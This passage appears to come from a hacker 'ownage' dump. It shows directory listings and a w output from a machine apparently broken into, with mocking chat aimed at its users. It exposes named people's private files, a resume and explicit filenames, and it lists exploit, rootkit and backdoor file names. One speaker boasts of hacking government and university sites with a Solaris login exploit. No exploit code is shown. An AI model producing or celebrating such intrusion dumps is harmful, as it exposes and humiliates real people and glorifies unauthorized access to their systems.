j staff 512 logintest -r--r--r-- 1 j staff 5361 pam_impl.h -rw-r--r-- 1 420 staff 161242 pf.irc drwxr-xr-x 2 j staff 512 plttest -rw-r--r-- 1 j staff 2237 rquota.h -rw-r--r-- 1 j staff 1526 rquota.x -rw-r--r-- 1 j staff 1094 rquota_clnt.c -rw-r--r-- 1 j staff 4703 rquota_svc.c -rw-r--r-- 1 j staff 5368 rquota_xdr.c -rwxr-xr-x 1 root other 6992 sizint -rw-r--r-- 1 root other 84 sizint.c -rwxr-xr-x 1 root other 15680 sl -rw-r--r-- 1 j staff 7051 sol.tar.gz -rw-r--r-- 1 j staff 1489778 sol7-includes.tar.gz -rw-r--r-- 1 j staff 11817 sparc_login.c drwxr-xr-x 14 root root 512 src -rwxr-xr-x 1 j staff 9504 test -rw-r--r-- 1 j staff 153 test.c -rwxr-xr-x 1 j staff 7052 tmp -rw-r--r-- 1 j staff 128 tmp.c -rw-r--r-- 1 root other 9847 truss -rwxr-xr-x 1 j staff 10344 uf -rw-r--r-- 1 j staff 2441 uf.c -rwxr-xr-x 1 j staff 9684 uf2 -rwxr-xr-x 1 420 staff 8280 w -rw-r--r-- 1 420 staff 1520 w00.c -rwxr-xr-x 1 j staff 9956 w00f -rw-r--r-- 1 j staff 2433 w00f.c -rw-r--r-- 1 root other 141 w00t.c -rwxr-xr-x 1 j staff 9084 z2 -rw-r--r-- 1 j staff 2006 z2.c -rwxr-xr-x 1 j staff 14252 z3 -rw-r--r-- 1 j staff 7812 z3.c $ ls -al ~jduck drwxr-xr-x 2 jduck staff 512 . drwxr-xr-x 7 root root 512 .. -rw------- 1 jduck staff 1646 .bash_history -rw-r--r-- 1 jduck staff 121 .bashrc -rw-r--r-- 1 jduck staff 124 .cshrc -rw-r--r-- 1 jduck staff 581 .login -rw-r--r-- 1 root root 368 Makefile -rw-r--r-- 1 root root 1423 README -rwsr-xr-- 1 root suid 7192 b1nd -rw------- 1 root other 218608 core -rw-r--r-- 1 root other 0 kkk -rw-r--r-- 1 root other 1200 memmove.o -rwxr-xr-x 1 jduck staff 15576 sl -rwxr-xr-x 1 root other 15608 sparc_login -rw-r--r-- 1 jduck staff 8662 sparc_login.c -rw-r--r-- 1 root other 98324 strmod -rwxr-xr-x 1 35303 root 5442 strmod.c -rw-r--r-- 1 root other 96352 strmod.o -rw-r--r-- 1 jduck staff 10240 strmod.tar -rw-r--r-- 1 root other 1164 strstr.o $ ls -al ~palmers total 106 drwxr-xr-x 3 palmers staff 512 . drwxr-xr-x 7 root root 512 .. -rw-rw-rw- 1 root staff 46 .bashrc -rw-rw-rw- 1 root staff 46 .profile -rwsr-xr-- 1 root suid 7192 b1nd -rw-r--r-- 1 palmers staff 40960 soa.tar drwxrwxrwx 2 30 root 512 soladore-0.00 More, more! $ ls -al /windows total 6566658 -rwxr-xr-x 1 root wheel 4 $DRVLTR$.~_~ -r-xr-xr-x 1 root wheel 228240 $LDR$ drwxr-xr-x 1 root wheel 32768 $WIN_NT$.~BT -rwxr-xr-x 1 root wheel 4700204 (Bill Clinton) - Al Gore Paradise.wav drwxr-xr-x 1 root wheel 32768 . drwxr-xr-x 22 root wheel 512 .. -rwxr-xr-x 1 root wheel 18948140 0151 - Bill Clinton - Sex Is Dandy (Marcy Playground - Sex & Candy).wav -rwxr-xr-x 1 root wheel 29439 101500.cgi -rwxr-xr-x 1 root wheel 565 101500.zip drwxr-xr-x 1 root wheel 32768 3dsmaxtemp -rwxr-xr-x 1 root wheel 667222016 4.4-install.iso -r-xr-xr-x 1 root wheel 566 ASD.LOG drwxr-xr-x 1 root wheel 32768 ATI -rwxr-xr-x 1 root wheel 271 AUTOEXEC.BAK -rwxr-xr-x 1 root wheel 254 AUTOEXEC.BAT -rwxr-xr-x 1 root wheel 392 AspiLog.TXT drwxr-xr-x 1 root wheel 32768 BDE -r-xr-xr-x 1 root wheel 178 BOOT.INI -rwxr-xr-x 1 root wheel 46822 BOOTLOG.PRV -rwxr-xr-x 1 root wheel 56966 BOOTLOG.TXT -r-xr-xr-x 1 root wheel 512 BOOTSECT.DOS -rwxr-xr-x 1 root wheel 15611948 Bill_Clinton-Gettin_sticky_wit_it.wav -rwxr-xr-x 1 root wheel 51300908 Billy Joel - We Didn't Start the Fire.wav -rwxr-xr-x 1 root wheel 11776 Bowie_Jonathan.doc -r-xr-xr-x 1 root wheel 241696 CLASSES.1ST -rwxr-xr-x 1 root wheel 93040 COMMAND.COM -rwxr-xr-x 1 root wheel 0 CONFIG.BAK -rwxr-xr-x 1 root wheel 0 CONFIG.SYS drwxr-xr-x 1 root wheel 32768 Casey's Punk -rwxr-xr-x 1 root wheel 12156 CaseyXmasXXX.cmp drwxr-xr-x 1 root wheel 32768 Casino -rwxr-xr-x 1 root wheel 46404 DETLOG.TXT -rwxr-xr-x 1 root wheel 40527404 DJ Diggity - Nelly & Others - (Hot Shit) Country Grammar [Remix].wav -rwxr-xr-x 1 root wheel 20381228 Isaac - Face Down, Ass Up, That's the way we like to fuck.wav -rwxr-xr-x 1 root wheel 3951 Dreamisoz.fr.st-hlg-hunt.bob -rwxr-xr-x 1 root wheel 32768 Excitebike 64 (U) [!].mpk -rwxr-xr-x 1 root wheel 16777216 Excitebike 64 (U) [!].rom -rwxr-xr-x 1 root wheel 6445060 Expert Blowjob01 (19 Sec) - Amazing! Deepthroat Blowjob Sex Young Hidden Voyeur Amateur.mpg drwxr-xr-x 1 root wheel 32768 FFX Videos drwxr-xr-x 1 root wheel 32768 FLWBass Demo drwxr-xr-x 1 root wheel 32768 Folder Settings drwxr-xr-x 1 root wheel 32768 Games drwxr-xr-x 1 root wheel 32768 Hack drwxr-xr-x 1 root wheel 32768 INSTALL -r-xr-xr-x 1 root wheel 110080 IO.SYS -rwxr-xr-x 1 root wheel 608 IPH.PH -rwxr-xr-x 1 root wheel 46058037 ISS.System.Security.Scanner.v4.WinNT2K.DOD.tar.gz drwxr-xr-x 1 root wheel 32768 ISSv4 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R00 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R01 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R02 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R03 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R04 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R05 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R06 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R07 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R08 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R09 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R10 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R11 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R12 -rwxr-xr-x 1 root wheel 2880000 ISSv4.R13 -rwxr-xr-x 1 root wheel 2809651 ISSv4.R14 -rwxr-xr-x 1 root wheel 2880000 ISSv4.RAR -rwxr-xr-x 1 root wheel 2177360 InstallShockmachine.EXE -rwxr-xr-x 1 root wheel 11264 Jonathan_Bowie_Resume.doc -rwxr-xr-x 1 root wheel 4 MSDOS.--- -r-xr-xr-x 1 root wheel 1664 MSDOS.SYS drwxr-xr-x 1 root wheel 32768 MSVS98 -rwxr-xr-x 1 root wheel 679673856 Mandrake81-cd1-inst.i586.iso drwxr-xr-x 1 root wheel 32768 Music drwxr-xr-x 1 root wheel 32768 My Documents drwxr-xr-x 1 root wheel 32768 My Music -rwxr-xr-x 1 root wheel 32768 NBA Jam 2000 (U) [!].mpk -rwxr-xr-x 1 root wheel 16777216 NBA Jam 2000 (U) [!].v64 drwxr-xr-x 1 root wheel 32768 NCDTREE -rwxr-xr-x 1 root wheel 16211 NETLOG.TXT -rwxr-xr-x 1 root wheel 45992492 Nas & Puff Daddy - Hate Me Now.wav drwxr-xr-x 1 root wheel 32768 NovaLogic -rwxr-xr-x 1 root wheel 358842368 OpenBSD30-i386-base-ipf.iso -rwxr-xr-x 1 root wheel 2527 PCcheck.LOG drwxr-xr-x 1 root wheel 32768 PSA Stuff drwxr-xr-x 1 root wheel 32768 Program Files -rwxr-xr-x 1 root wheel 1448 README.TXT -rwxr-xr-x 1 root wheel 86016 REGMON.EXE -rwxr-xr-x 1 root wheel 13232 REGMON.HLP -rwxr-xr-x 1 root wheel 22576 REGSYS.SYS -rwxr-xr-x 1 root wheel 23143 REGVXD.VXD drwxr-xr-x 1 root wheel 32768 Recycled -rwxr-xr-x 1 root wheel 445 SCANDISK.LOG -rwxr-xr-x 1 root wheel 189869 SETUPLOG.TXT -rwxr-xr-x 1 root wheel 6889472 SSHWinClient-3.1.0-build235.exe -rwxr-xr-x 1 root wheel 5166 SUHDLOG.DAT -rwxr-xr-x 1 root wheel 544800 SYSTEM.1ST drwxr-xr-x 1 root wheel 32768 Shit Talker v1.2 drwxr-xr-x 1 root wheel 32768 Sketcher drwxr-xr-x 1 root wheel 32768 SoftIce drwxr-xr-x 1 root wheel 32768 Sonja Songs drwxr-xr-x 1 root wheel 32768 Temp -rwxr-xr-x 1 root wheel 261876069 TheSims.rar -rwxr-xr-x 1 root wheel 4159692 Traci - Deep_Inside_Traci _Lords.mov -rwxr-xr-x 1 root wheel 10986500 Tracy n Ron.mpg -rwxr-xr-x 1 root wheel 1667960 Untitled-1.psd -rwxr-xr-x 1 root wheel 1167628 Untitled-2.psd -rwxr-xr-x 1 root wheel 49152 VIDEOROM.BIN drwxr-xr-x 1 root wheel 32768 Valerie2 drwxr-xr-x 1 root wheel 32768 WAVs drwxr-xr-x 1 root wheel 32768 WINDOWS drwxr-xr-x 1 root wheel 32768 WINWORD -rwxr-xr-x 1 root wheel 62 WS_FTP.LOG drwxr-xr-x 1 root wheel 32768 Winzip drwxr-xr-x 1 root wheel 32768 _RESTORE drwxr-xr-x 1 root wheel 32768 acadtemp drwxr-xr-x 1 root wheel 32768 acidwarp -rwxr-xr-x 1 root wheel 669935 anarchy.txt -rwxr-xr-x 1 root wheel 931004 anarchyv5.zip -rwxr-xr-x 1 root wheel 731617 audc20.exe -rwxr-xr-x 1 root wheel 224 autoexec.nav -rwxr-xr-x 1 root wheel 1120 baseclasses.log -rwxr-xr-x 1 root wheel 647181 bee.txt drwxr-xr-x 1 root wheel 32768 bill -rwxr-xr-x 1 root wheel 403916 bing-j.jpg -rwxr-xr-x 1 root wheel 488217 bing1-j.jpg -rwxr-xr-x 1 root wheel 1459 blah -rwxr-xr-x 1 root wheel 177298 bombs.zip drwxr-xr-x 1 root wheel 32768 cable modems - breaks the lancity modem cap -rwxr-xr-x 1 root wheel 2378 cart.html drwxr-xr-x 1 root wheel 32768 caseyxmas -rwxr-xr-x 1 root wheel 9771787 cdjd.exe -rwxr-xr-x 1 root wheel 402789 cj_7979.wmv drwxr-xr-x 1 root wheel 32768 contrib -rwxr-xr-x 1 root wheel 644608 cookbook97.doc -rwxr-xr-x 1 root wheel 97458 corn029[1].zip drwxr-xr-x 1 root wheel 32768 cripto -rwxr-xr-x 1 root wheel 159258 csircd-1.13.tar.gz -rwxr-xr-x 1 root wheel 127502 curt-mosiac.jpg -rwxr-xr-x 1 root wheel 1629844 curt-mosiac.psd drwxr-xr-x 1 root wheel 32768 cygwin -rwxr-xr-x 1 root wheel 163437 data1024.dbb -rwxr-xr-x 1 root wheel 173396 data256.dbb -rwxr-xr-x 1 root wheel 9303 data4096.dbb drwxr-xr-x 1 root wheel 32768 dc-ufc drwxr-xr-x 1 root wheel 32768 dcstuff drwxr-xr-x 1 root wheel 32768 decoded drwxr-xr-x 1 root wheel 32768 deusex -rwxr-xr-x 1 root wheel 8769 dod.nfo -rwxr-xr-x 1 root wheel 34179 download.cgi -rwxr-xr-x 1 root wheel 20000000 e-cp2k.001 -rwxr-xr-x 1 root wheel 337 e-cp2k.sfv -rwxr-xr-x 1 root wheel 20000000 e-gta2dc.001 -rwxr-xr-x 1 root wheel 20000000 e-hoylec.001 -rwxr-xr-x 1 root wheel 18456576 e-sf3rds.001 -rwxr-xr-x 1 root wheel 18268 e_nav2001be.zip -rwxr-xr-x 1 root wheel 468087 ec2t2.exe -rwxr-xr-x 1 root wheel 1248 envja6hw.sys -rwxr-xr-x 1 root wheel 1248 envjawt3.sys -rwxr-xr-x 1 root wheel 414 file_id.diz -rwxr-xr-x 1 root wheel 632485888 flwpro.iso drwxr-xr-x 1 root wheel 32768 ftproot -rwxr-xr-x 1 root wheel 2407 g_lps_ies[1].zip -rwxr-xr-x 1 root wheel 11070 gr_Budswell Stoner.current -rwxr-xr-x 1 root wheel 7135 gr_Budswell Stoner.previous drwxr-xr-x 1 root wheel 32768 hacker -rwxr-xr-x 1 root wheel 267526 hamilton.bmp -rwxr-xr-x 1 root wheel 74416 hamilton.psf -rwxr-xr-x 1 root wheel 840 hydro.txt drwxr-xr-x 1 root wheel 32768 ida drwxr-xr-x 1 root wheel 32768 ios -rwxr-xr-x 1 root wheel 1871 ip.txt -rwxr-xr-x 1 root wheel 394069 j.jpg -rwxr-xr-x 1 root wheel 20000000 kal-ths2.001 -rwxr-xr-x 1 root wheel 24576 kill_cih.exe drwxr-xr-x 1 root wheel 32768 latest -rwxr-xr-x 1 root wheel 12555 lp-shop.html drwxr-xr-x 1 root wheel 32768 mIRC drwxr-xr-x 1 root wheel 32768 mame -rwxr-xr-x 1 root wheel 20875 marb.jpg drwxr-xr-x 1 root wheel 32768 master_of_orion_2 -rwxr-xr-x 1 root wheel 7737584 mjb51149enu.exe drwxr-xr-x 1 root wheel 32768 mp3z -rwxr-xr-x 1 root wheel 98 mp_.current -rwxr-xr-x 1 root wheel 90 mp_.previous -rwxr-xr-x 1 root wheel 10 mp_Budswell Stoner.current -rwxr-xr-x 1 root wheel 50 mp_Budswell Stoner.previous -rwxr-xr-x 1 root wheel 17488 msiexec.ex_ drwxr-xr-x 1 root wheel 32768 msme drwxr-xr-x 1 root wheel 32768 na2002 -rwxr-xr-x 1 root wheel 0 nav80try.exe -rwxr-xr-x 1 root wheel 4869253 netzero.exe -rwxr-xr-x 1 root wheel 10001569 nortonpersonalfirewall2001_2.5_en-us.rar -r-xr-xr-x 1 root wheel 34420 ntdetect.com -rwxr-xr-x 1 root wheel 13196572 nticdmaker508full[1].zip -r-xr-xr-x 1 root wheel 213904 ntldr drwxr-xr-x 1 root wheel 32768 officeinst drwxr-xr-x 1 root wheel 32768 opennap -rwxr-xr-x 1 root wheel 598 os581474.bin drwxr-xr-x 1 root wheel 32768 ps.tmp -rwxr-xr-x 1 root wheel 147456 pscp-x86.exe -rwxr-xr-x 1 root wheel 8076 rcdet.txt -rwxr-xr-x 1 root wheel 174460928 rq_ext1.mpg drwxr-xr-x 1 root wheel 32768 sb3 -rwxr-xr-x 1 root wheel 32059 self-igniting.txt drwxr-xr-x 1 root wheel 32768 shockwave4kc -rwxr-xr-x 1 root wheel 703368 shockwaveinstaller.exe -rwxr-xr-x 1 root wheel 258668 shoutcast-1-8-3-windows.exe drwxr-xr-x 1 root wheel 32768 snort-1.7-win32-static drwxr-xr-x 1 root wheel 32768 sol7-pkgs drwxr-xr-x 1 root wheel 32768 sony drwxr-xr-x 1 root wheel 32768 source drwxr-xr-x 1 root wheel 32768 sta drwxr-xr-x 1 root wheel 32768 stuf drwxr-xr-x 1 root wheel 32768 tp2002 -r-xr-xr-x 1 root wheel 379906 txtsetup.sif drwxr-xr-x 1 root wheel 32768 untitled drwxr-xr-x 1 root wheel 32768 vctut drwxr-xr-x 1 root wheel 32768 wftpd -rwxr-xr-x 1 root wheel 2412 whatsnew.txt -rwxr-xr-x 1 root wheel 3644834 winamp2666_u2.exe drwxr-xr-x 1 root wheel 32768 xinstall drwxr-xr-x 1 root wheel 32768 zoo drwxr-xr-x 1 root wheel 32768 zsnesw We didn't start the fire is a GAY song. should i show my special porn dir? let me grep out a few things in the ls $ ls -al porn DUE TO THE DISGUSTING NATURE OF THIS LS, WE HAVE FORBID OURSELVES TO SHOW IT. Disgusting.. You are sick. :D:D:D:D:D:D:D Chunks of caviar, on the floor, and on my leg. $ w USER TTY FROM LOGIN@ IDLE WHAT root v0 - Wed04PM 2days xinit /root/.xinitrc - root p0 :0.0 Wed04PM 6:49 csh root p1 :0.0 Wed04PM 5:11 ssh -C -l jobe -c 3des root p2 :0.0 Wed06PM 7:58 vi sparc-solaris root p3 :0.0 Wed06PM 4:06 ssh -C -l jobe -c 3des root p4 :0.0 Thu05AM 1day vi test_sol_login.c root p5 :0.0 Thu05AM 4:06 bash root p6 :0.0 Thu01PM 4:12 csh root p7 :0.0 Thu02PM 1day csh root p8 :0.0 Fri11AM 4:06 csh r0b1n v1 - Fri11AM - w $ ls -al /root drwxr-xr-x 33 root wheel 4096 . drwxr-xr-x 22 root wheel 512 .. -rw------- 1 root wheel 191 .Xauthority -rw------- 1 root wheel 625 .althearc -rw------- 1 root wheel 63035 .bash_history -rw-r--r-- 2 root wheel 802 .cshrc drwxr-xr-t 2 root wheel 512 .esd drwxr-xr-x 2 root wheel 512 .ethereal drwxr-xr-x 4 root wheel 512 .gnapster -rw------- 1 root wheel 3013 .history -rw-r--r-- 1 root wheel 142 .klogin drwx------ 2 root wheel 512 .kza -rw-r--r-- 1 root wheel 297 .login drwxr-xr-x 3 root wheel 512 .mozilla drwx------ 4 root wheel 512 .netscape -rw------- 1 root wheel 44 .poppyrc -rw-r--r-- 2 root wheel 251 .profile drwx------ 2 root wheel 512 .ssh drwxr-xr-x 2 root wheel 512 .ssh2 -rw-r--r-- 1 root wheel 5101 .suids lrwxr-xr-x 1 root wheel 12 .wine -> /stuff/.wine -rw-r--r-- 1 root wheel 464 .wmpop3rc drwxr-xr-x 2 root wheel 512 .xine -rwxr-xr-x 1 root wheel 108 .xinitrc drwxr-xr-x 4 root wheel 512 .xmms -rwxr-xr-x 1 root wheel 108 .xsession drwxr-xr-x 2 root wheel 512 7350cfingerd -rw-r--r-- 1 root wheel 19713 7350cfingerd-0.0.4.tar.gz -rw-r--r-- 1 root wheel 414316 CURRENT.tar.gz -rw-r--r-- 1 root wheel 3840 Changelog -rw-r--r-- 1 root wheel 4781 Collector-1.0.tar.gz -rw-r--r-- 1 root wheel 90 FILE_ID.DIZ drwxr-xr-x 5 root wheel 512 GNUstep -rw-r--r-- 1 root wheel 7655 Hunter-1.2.tar.gz -rw-r--r-- 1 root wheel 7011 ICMP-Tunnel_P4-1.0.tar.gz drwx------ 2 root wheel 512 Mail -rw-r--r-- 1 root wheel 3805 Makefile -rw-r--r-- 1 root wheel 2252 README -rw-r--r-- 1 root wheel 6246 Searcher-8.0.tar.gz -rw-r--r-- 1 root wheel 16744 Smeagol-4.4.4.tar.gz drwxr-xr-x 3 root wheel 1024 StMichael_LKM-0.08 -rw-r--r-- 1 root wheel 30545 StMichael_LKM-0.08.tar.gz -rw-r--r-- 1 root wheel 903514 V8.pdf -rw------- 1 root wheel 864256 XF86_SVGA.core -rwxr-xr-x 1 root wheel 6415 abo10 -rw-r--r-- 1 root wheel 224 abo10.c -rwxr-xr-x 1 root wheel 50589 abo2 -rw-r--r-- 1 root wheel 381 abo2.c -rwxr-xr-x 1 root wheel 4461 abo2.new -rwxr-xr-x 1 root wheel 4606 abo3 -rw-r--r-- 1 root wheel 433 abo3.c -rwxr-xr-x 1 root wheel 4546 abo3.new -rwxr-xr-x 1 root wheel 4843 abo4 -rw-r--r-- 1 root wheel 495 abo4.c -rwxr-xr-x 1 root wheel 6228 abo5 -rw-r--r-- 1 root wheel 632 abo5.c -rw------- 1 root wheel 294912 abo5.core -rwxr-xr-x 1 root wheel 15470 abo6 -rw-r--r-- 1 root wheel 371 abo6.c -rw------- 1 root wheel 8329 abo6.ktrace -rwxr-xr-x 1 root wheel 4580 abo6.new -rwxr-xr-x 1 root wheel 6134 abo7 -rw-r--r-- 1 root wheel 90 abo7.c -rwxr-xr-x 1 root wheel 8404 abo8 -rw-r--r-- 1 root wheel 252 abo8.c -rwxr-xr-x 1 root wheel 6176 abo9 -rw-r--r-- 1 root wheel 191 abo9.c drwxr-xr-x 3 root wheel 512 adore -rw-r--r-- 1 root wheel 14749 adore-0.42.tgz -rw-r--r-- 1 root wheel 46403 b00s -rw-r--r-- 1 root wheel 0 blah -rw-r--r-- 1 root wheel 258 bll -rw-r--r-- 1 root wheel 6401 boink.c -rw-r--r-- 1 root wheel 445006 bz.hosts -rwxr-xr-x 1 root wheel 4235 call -rw-r--r-- 1 root wheel 32 call.c -rw-r--r-- 1 root wheel 3339 clear-1.3.tar.gz -rwxr-xr-x 1 root wheel 12239 cmsd -rw-r--r-- 1 root wheel 1872 cnt-svr-filetransfer.tar.gz -rw-r--r-- 1 root wheel 1438 daemonshell.tar.gz drwxr-xr-x 2 root wheel 512 data -rw-r--r-- 1 root wheel 273 done.up -rw-r--r-- 1 root wheel 635195 edu -rwxr-xr-x 1 root wheel 6018 er -rw-r--r-- 1 root wheel 2845 errors -rwxr-xr-x 1 root wheel 11146 ex_abo2 -rw-r--r-- 1 root wheel 1044 ex_abo2.c -rwxr-xr-x 1 root wheel 4925 ex_abo3 -rw-r--r-- 1 root wheel 768 ex_abo3.c -rwxr-xr-x 1 root wheel 4957 ex_abo4 -rw-r--r-- 1 root wheel 844 ex_abo4.c -rwxr-xr-x 1 root wheel 10856 ex_abo5 -rw-r--r-- 1 root wheel 1272 ex_abo5.c -rw------- 1 root wheel 21092 ex_abo5.out -rwxr-xr-x 1 root wheel 4888 ex_abo6 -rw-r--r-- 1 root wheel 1268 ex_abo6.c -rw------- 1 root wheel 16005 ex_abo6.out -rwxr-xr-x 1 root wheel 4844 ex_abo7 -rw-r--r-- 1 root wheel 1183 ex_abo7.c -rw------- 1 root wheel 15698 ex_abo7.out -rwxr-xr-x 1 root wheel 5175 ex_abo8 -rw-r--r-- 1 root wheel 1358 ex_abo8.c -rw------- 1 root wheel 8023 ex_abo8.out -rwxr-xr-x 1 root wheel 4536 ex_fsx6 -rw-r--r-- 1 root wheel 181 ex_fsx6.c -rw-r--r-- 1 root wheel 1390 exec_race.c -rw-r--r-- 1 root wheel 5475 fawx.c drwxr-xr-x 2 root wheel 512 fhffp -rw-r--r-- 1 root wheel 0 file -rw-r--r-- 1 root wheel 2937 fingerd-fileserver.tar.gz -rwxr-xr-x 1 root wheel 4685 forktest -rw-r--r-- 1 root wheel 239 forktest.c -rwxr-xr-x 1 root wheel 6083 fstring -rw-r--r-- 1 root wheel 91 fstring.c -rwxr-xr-x 1 root wheel 7999 fsx6 -rw-r--r-- 1 root wheel 413 fsx6.c -rwxr-xr-x 1 root wheel 6134 gabo7 -rw-r--r-- 1 root wheel 1790 gdb.txt -rw-r--r-- 1 root wheel 11629 generic.h -rw-r--r-- 1 root wheel 8501 ici.out -rw-r--r-- 1 root wheel 11852 in.telnetd drwxr-xr-x 2 root wheel 512 iob -rw-r--r-- 1 root wheel 5899 iob-0.1.tar.gz -rwxr-xr-x 1 root wheel 6499 killwin -rw-r--r-- 1 root wheel 1771 killwin.c -rw-r--r-- 1 root wheel 29 kr.hosts -rw------- 1 root wheel 72 ktrace.out drwxr-xr-x 2 root wheel 512 kza-0.401 drwx------ 2 root wheel 512 kza-downloads -rw-r--r-- 1 root wheel 294517 kza.linux.tar.gz -rwxr-xr-x 1 root wheel 9911 loginex -rw-r--r-- 1 root wheel 7650 loginex.c drwxr-xr-x 2 root wheel 512 mtv -rw-r--r-- 1 root wheel 258322 mtv-1.0.8.0.tar.gz -rw-r--r-- 1 root wheel 75267 nc110.tgz -rw-r--r-- 1 root wheel 2645 netcat.blurb -rw-r--r-- 1 root wheel 58553 netcat.c drwx------ 7 root wheel 512 ninja-1.5.7 -rw-r--r-- 1 root wheel 693696 ninja-1.5.7.tar.gz -rw-r--r-- 1 root wheel 693696 ninja-src.tar.gz drwxr-xr-x 6 root wheel 6656 openssh-3.0.2p1 -rw-r--r-- 1 root wheel 781092 openssh-3.0.2p1.tar.gz -rwxr-xr-x 1 root wheel 4671 passprog -rw-r--r-- 1 root wheel 479 passprog.c -rwxr-xr-x 1 root wheel 6270 passtest -rw-r--r-- 1 root wheel 2004 passtest.c -rw------- 1 root wheel 11650 passtest.out -rw-r--r-- 1 root wheel 1684 paz-1.0.tar.gz -rwxr-xr-x 1 root wheel 9477 pepsi -rw-r--r-- 1 root wheel 7215 pepsi.c -rwxr-xr-x 1 root wheel 6267 pinger -rw-r--r-- 1 root wheel 3013 pinger.c -rw-r--r-- 1 root wheel 2770 probe-2.3.tar.gz -rw-r--r-- 1 root wheel 54184 qcrack-1.02.tar.gz -rw-r--r-- 1 root wheel 121423 roseposter.jpg -rwxr-xr-x 1 root wheel 5116 sc -rw-r--r-- 1 root wheel 327 sc.c drwxr-xr-x 2 root wheel 512 screamingCobra-1.04 drwxr-xr-x 2 root wheel 512 scripts -rwxr-xr-x 1 root wheel 4352 sizint -rw-r--r-- 1 root wheel 101 sizint.c -rw-r--r-- 1 root wheel 378 sol-ffcore.sh -rw-r--r-- 1 root wheel 12091 solsparc_rpc.cmsd.c -rwxr-xr-x 1 root wheel 9832 sparc_login -rw-r--r-- 1 root wheel 8598 sparc_login.c -rw------- 1 root wheel 299008 sparc_login.core -rwxr-xr-x 1 root wheel 24444 sparc_login2 -rw------- 1 root wheel 299008 sparc_login2.core drwxr-xr-x 4 root wheel 3072 ssh-1.2.32 -rw-r--r-- 1 root wheel 1030240 ssh-1.2.32.tar.gz drwxr-xr-x 5 root wheel 1024 ssh-2.4.0 -rw-r--r-- 1 root wheel 1911375 ssh-2.4.0.tar.gz -rw-r--r-- 1 root wheel 14368 statdx2.c -rw-r--r-- 1 root wheel 5856 statdx2.tar.gz -rwxr-xr-x 1 root wheel 8549 stupidh -rwxr-xr-x 1 root wheel 7797 syndrop -rw-r--r-- 1 root wheel 7900 syndrop.c -rwxr-xr-x 1 root wheel 5086 t -rw-r--r-- 1 root wheel 6360 t-shirt-4.0.tar.gz -rw-r--r-- 1 root wheel 2123 t3.c -rw-r--r-- 1 root wheel 2843 tao.c -rw-r--r-- 1 root wheel 34692 targa.c -rwxr-xr-x 1 root wheel 4351 test -rw-r--r-- 1 root wheel 303 test.c -rw------- 1 root wheel 282624 test.core -rwxr-xr-x 1 root wheel 12267 test_sol_login -rw-r--r-- 1 root wheel 13357 test_sol_login.c -rwxr-xr-x 1 root wheel 5875 testsc -rw-r--r-- 1 root wheel 864 testsc.c -rwxr-xr-x 1 root wheel 8322 testsh -rw-r--r-- 1 root wheel 120 testsh.c -rwxr-xr-x 1 root wheel 4579 teststat -rw-r--r-- 1 root wheel 231 teststat.c -rw-r--r-- 1 root wheel 68401 thc-uht1.tgz -rw-r--r-- 1 root wheel 11936 udpd -rw-r--r-- 1 root wheel 3330 udpsh.tar.gz drwxr-xr-x 2 root wheel 512 udpshell -rw-r--r-- 1 root wheel 1124 w00p drwxr-xr-x 3 root wheel 512 work -rwxr-xr-x 1 root wheel 13720 x2 drwxr-xr-x 7 root wheel 1024 xpdf-1.00 -rw-r--r-- 1 root wheel 397750 xpdf-1.00.tar.gz -rw------- 1 root wheel 839680 xterm.core drwxr-xr-x 2 root wheel 512 zap3 -rw-r--r-- 1 root wheel 3176 zap3.tar.gz I can't help but notice but what is that kr.hosts file? And + bz.hosts? those are lp's, f0r wh3n i h4ck shit i use udpshell on everything i own Looks like you are a fan of gera (a w00w00 patriot) and his + advanced buffer overflow challenges. i've mastered all of them! sparc_login.c is my solaris login exploit i hack .gov's and .edu's with it well me and jduck i hacked the entire internet with my dtspcd and jobe's solaris login + exploit. $ ls -al ~j drwxr-xr-x 11 j j 2048 . drwxr-xr-x 23 root wheel 512 .. -rw-r--r-- 1 root jduck 1735738 .pw.pu drwx------ 2 j j 512 .ssh -rw-r--r-- 1 j j 171542 2k.more -rw-r--r-- 1 j j 22605 600.more drwxr-xr-x 2 root wheel 1024 ADMmutate-0.8.4 -rw-r--r-- 1 j j 29108 ADMmutate-0.8.4.tar.gz drwx------ 2 root wheel 512 ASMCODES-1.0.2 -rw-r--r-- 1 j j 2526 ChangeLog drwxr-xr-x 2 1852 25 512 ILINXR.install -rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r00 -rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r01 -rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r02 -rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r03 -rw-r--r-- 1 root j 319488 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r04 -rw-r--r-- 1 j j 469 README.513 -rw-r--r-- 1 j j 8250103 VSC513.tar.Z -rw-r--r-- 1 j j 7069 VSCR513.ps.Z -rw-r--r-- 1 j j 103743 VSCU513.ps.Z -rw-r--r-- 1 j j 14101 asmcodes-1.0.2.tar.gz -rw------- 1 root j 32333 b00 -rw-r--r-- 1 j j 7192 b1nd -rw-r--r-- 1 j j 18436 bb drwxr-xr-x 5 root wheel 1024 binutils-020210 -rw-r--r-- 1 root wheel 57057280 binutils.tar -rwxr-x--- 1 j j 851 cisco-tools -rw-r--r-- 1 j j 243312 core -rw-r--r-- 1 j j 1262996 dbx-sparc.gz -rwxr-xr-x 1 root j 14012 discover -rw-r--r-- 1 j j 3424 discover.c -rw-r--r-- 1 root jduck 84967 edu.tld -rwxr-xr-x 1 root j 6018 er -rw-r--r-- 1 root j 3574 errors drwx------ 18 220 1002 1024 gcc-teso -rw-r--r-- 1 root j 14270640 gcc-teso.tar.gz -rw-r--r-- 1 j j 9801816 gdb -rwxr-xr-x 1 j j 334 get_pg.pl -rw-r--r-- 1 root j 19214 hello 